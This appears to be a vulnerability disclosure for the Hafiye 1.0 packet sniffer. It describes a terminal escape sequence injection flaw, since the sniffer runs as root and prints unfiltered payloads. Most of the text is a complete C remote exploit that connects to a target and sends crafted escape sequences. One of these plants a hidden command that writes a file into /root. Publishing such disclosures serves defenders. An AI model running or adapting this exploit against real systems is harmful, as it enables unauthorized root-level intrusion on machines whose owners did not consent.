hafiye.txt

`  
+-------[ Software ]--------------+  
  
Hafiye [1.0] "POSIX-compliant, customizable TCP/IP packet sniffer."  
  
+-------[ Tested Versions ]--------------+  
  
Hafiye[1.0]  
Tested on:Linux(Hafiye compiled from tarball)  
FreeBSD 4.7 (Installed from CD)  
  
+-------[ Vulnerability ]--------------+  
  
Packet Payload Terminal Escape Sequence Injection Vulnerability.  
  
Results: DoS/Remote Root Comprimise  
  
+-------[ Description ]--------------+  
  
Hafiye[1.0] is a POSIX-compliant, customizable TCP/IP packet sniffer.  
It runs with uid0 privilege.  
  
Hafiye-1.0 doesnt filter the payload when printing it to the terminal.  
A malicious attacker can send packets with escape sequence payloads  
to exploit this vulnerability.  
  
If Hafiye has been started with -n packet count option ,  
the vulnerability could allow remote code execution.  
For remote code execution the victim must press Enter after program exit.  
  
+-------[ Contact ]--------------+  
  
http://deicide.siyahsapka.org  
  
[email protected]  
  
  
+-------[ Proof Of Concept Exploit ]--------------+  
  
  
/* Remote Exploit for Hafiye-1.0  
** Terminal Escape Sequence Injection Vulnerability  
** Written by Serkan Akpolat  
** Homepage: http://deicide.siyahsapka.org  
** E-mail: [email protected]  
** Greets: Virulent, gorny and all other netricians  
*/  
#include <stdio.h>  
#include <sys/types.h>  
#include <string.h>  
#include <unistd.h>  
#include <sys/socket.h>  
#include <netdb.h>  
#include <stdlib.h>  
  
typedef struct _target {  
char *host;  
u_short port;  
unsigned int sequence;  
unsigned int cnt;  
} target;  
  
char *esc_sequence[]= {"Escape Sequences",  
"\x1b""]2;Insecure?""\x07\x0a",  
"\x07\x07\x07\x07\x07\x07",  
"\x1b""]2;;echo Owned > /root/Owned.txt"  
"\x07\x1b""[21t""\x1b""]2;xterm""\x07"  
"Abnormal Termination""\x1b"  
"[8m;""\x0a"};  
  
  
char use[] ="\t[ -h host ] [ -p port ] [ -e esc-seq-n ] [ -l number ]\n"  
"\t Escape Sequences :\n"  
"\t1-Change TitleBar Text to \"Insecure?\"\n"  
"\t2-Ring The Bell\n"  
"\t3-Hidden Prompt to Create Owned.txt in /root\n"  
"\tExample: ./exp -h 192.168.0.3 -p 80 -e 1 -l 1\n";  
  
void usage()  
{  
printf("%s",use);  
exit(1);  
}  
  
int connect_to_host(char *host, u_short port)  
{  
int sock = 0;  
struct hostent *hp;  
struct sockaddr_in sa;  
  
memset(&sa, 0, sizeof(sa));  
  
hp = gethostbyname(host);  
if (hp == NULL) {  
herror("Error:");  
exit(1);  
}  
sa.sin_family = AF_INET;  
sa.sin_port = htons(port);  
sa.sin_addr = **((struct in_addr **) hp->h_addr_list);  
  
sock = socket(AF_INET, SOCK_STREAM, 0);  
if (sock < 0)  
exit(1);  
  
if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)  
exit(1);  
  
printf("[+] Connected to %s\n", host);  
return sock;  
}  
  
int main(int argc, char **argv)  
{  
int i;  
int sock = 0;  
char buf[256]="\0";  
target target;  
memset(&target,0,sizeof(target));  
while ((i = getopt(argc, argv, "h:p:e:l:")) != -1) {  
switch (i) {  
case 'h':  
target.host = optarg;  
break;  
case 'p':  
target.port = (u_short)atoi(optarg);  
break;  
case 'e':  
target.sequence = atoi(optarg);  
if(target.sequence < 1 || target.sequence > 3) {  
usage();  
}  
break;  
case 'l':  
target.cnt=atoi(optarg);  
if(target.cnt<1) {  
target.cnt=1;  
}  
break;  
case ':':  
case '?':  
default:  
usage();  
exit(1);  
}  
}  
if (optind != argc || !target.host || !target.port ||  
!target.sequence || !target.cnt) {  
usage();  
}  
  
sock = connect_to_host(target.host, target.port);  
strncpy(buf,esc_sequence[target.sequence],sizeof(buf)-1);  
  
  
printf("[+] Sending Escape Sequences\n");  
do {  
if (send(sock, buf, strlen(buf), 0) < 0) {  
printf("Socket Error\n");  
exit(1);  
}  
target.cnt--;  
} while(target.cnt > 0);  
close(sock);  
return 0;  
}  
`